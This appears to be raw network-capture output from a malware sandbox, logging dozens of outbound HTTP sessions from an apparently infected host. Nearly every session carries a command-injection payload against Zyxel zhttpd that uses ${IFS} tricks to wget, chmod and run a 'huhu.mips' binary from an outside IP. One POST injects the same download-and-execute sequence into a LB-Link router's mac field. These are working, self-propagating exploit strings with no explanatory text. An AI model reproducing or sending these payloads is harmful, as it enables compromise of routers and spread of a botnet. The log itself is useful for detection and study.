                                                  Jan 19, 2024 18:23:58.108647108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5080192.168.2.1340136134.171.217.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.109765053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5081192.168.2.134179479.45.163.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.109893084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5082192.168.2.1337910205.190.74.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.110837936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5083192.168.2.133396240.16.120.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.110902071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5084192.168.2.1354426198.198.90.88443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.111623049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5085192.168.2.13428448.110.155.152443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.111701965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5086192.168.2.135237861.55.233.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.111716032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5087192.168.2.1351322184.112.227.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.111763954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5088192.168.2.1354594124.96.8.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.111845016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5089192.168.2.13391149.222.45.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.111845016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5090192.168.2.134974218.74.123.80443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.111891985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5091192.168.2.1347160128.58.126.176443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.111949921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5092192.168.2.1342346109.246.136.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.112011909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5093192.168.2.136032838.186.155.27443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.112011909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5094192.168.2.1355288136.181.149.18443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.112081051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5095192.168.2.1344924202.156.136.143443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.112096071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5096192.168.2.135519623.140.206.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.112131119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5097192.168.2.1338184191.109.28.54443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.112178087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5098192.168.2.135260847.77.199.146443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.112221956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5099192.168.2.1347542198.85.201.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.112251043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5100192.168.2.133775260.75.56.125443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.112287998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5101192.168.2.133587824.36.226.1438080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.358366013 CET231OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                  Cookie: user=admin
                                                  Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 34 36 2f 68 75 68 75 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 68 75 68 75 2e 6d 70 73 6c 3b 20 2e 2f 68 75 68 75 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                  Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.146/huhu.mpsl; chmod 777 huhu.mpsl; ./huhu.mpsl lblink.selfrep;rm *mpsl*;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5102192.168.2.133588024.36.226.1438080
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:58.649502993 CET268INHTTP/1.1 400 Bad Request
                                                  Server: httpd
                                                  Date: Fri, 19 Jan 2024 12:23:18 GMT
                                                  Content-Type: text/html
                                                  Connection: close
                                                  Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 34 3e 0a 4e 6f 20 72 65 71 75 65 73 74 20 66 6f 75 6e 64 2e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                  Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>400 Bad Request</H4>No request found.</BODY></HTML>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5103192.168.2.134600664.110.117.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121401072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5104192.168.2.1358830219.173.29.137443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121436119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5105192.168.2.134884648.192.176.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121484041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5106192.168.2.1352454129.67.110.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121517897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5107192.168.2.134759669.106.243.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121552944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5108192.168.2.134406868.60.141.219443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121606112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5109192.168.2.1357890178.162.217.117443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121658087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5110192.168.2.1357438124.47.221.49443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121695042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5111192.168.2.1342544153.75.96.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121737003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5112192.168.2.134434848.195.245.234443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121776104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5113192.168.2.1335458172.151.24.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121812105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5114192.168.2.1341264100.58.213.163443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121853113 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5115192.168.2.1341778199.76.41.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121865988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5116192.168.2.135923867.149.51.206443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121884108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5117192.168.2.135314213.56.88.123443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121953011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5118192.168.2.1358584116.85.137.168443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.121995926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5119192.168.2.1342876111.230.13.55443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122034073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5120192.168.2.134673067.181.106.158443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122081041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5121192.168.2.133544476.6.212.241443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122102976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5122192.168.2.135869485.121.148.200443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122149944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5123192.168.2.1357876153.175.225.3443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122174978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5124192.168.2.1333184138.119.176.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122217894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5125192.168.2.134218659.165.35.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122251987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5126192.168.2.1335630122.76.44.100443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122281075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5127192.168.2.1359956195.174.13.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122333050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5128192.168.2.135176487.57.111.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122373104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5129192.168.2.133837250.121.138.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122395039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5130192.168.2.135033492.57.180.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122453928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5131192.168.2.133678285.52.154.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122482061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5132192.168.2.135967425.130.247.153443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122525930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5133192.168.2.135323488.137.145.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122554064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5134192.168.2.1351754145.100.60.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122612953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5135192.168.2.134465643.178.213.38443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122648001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5136192.168.2.134677480.4.129.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122669935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5137192.168.2.135749670.235.213.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122720003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5138192.168.2.135691485.228.98.185443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.122755051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5139192.168.2.1334316123.160.151.209443
                                                  TimestampBytes transferredDirectionData
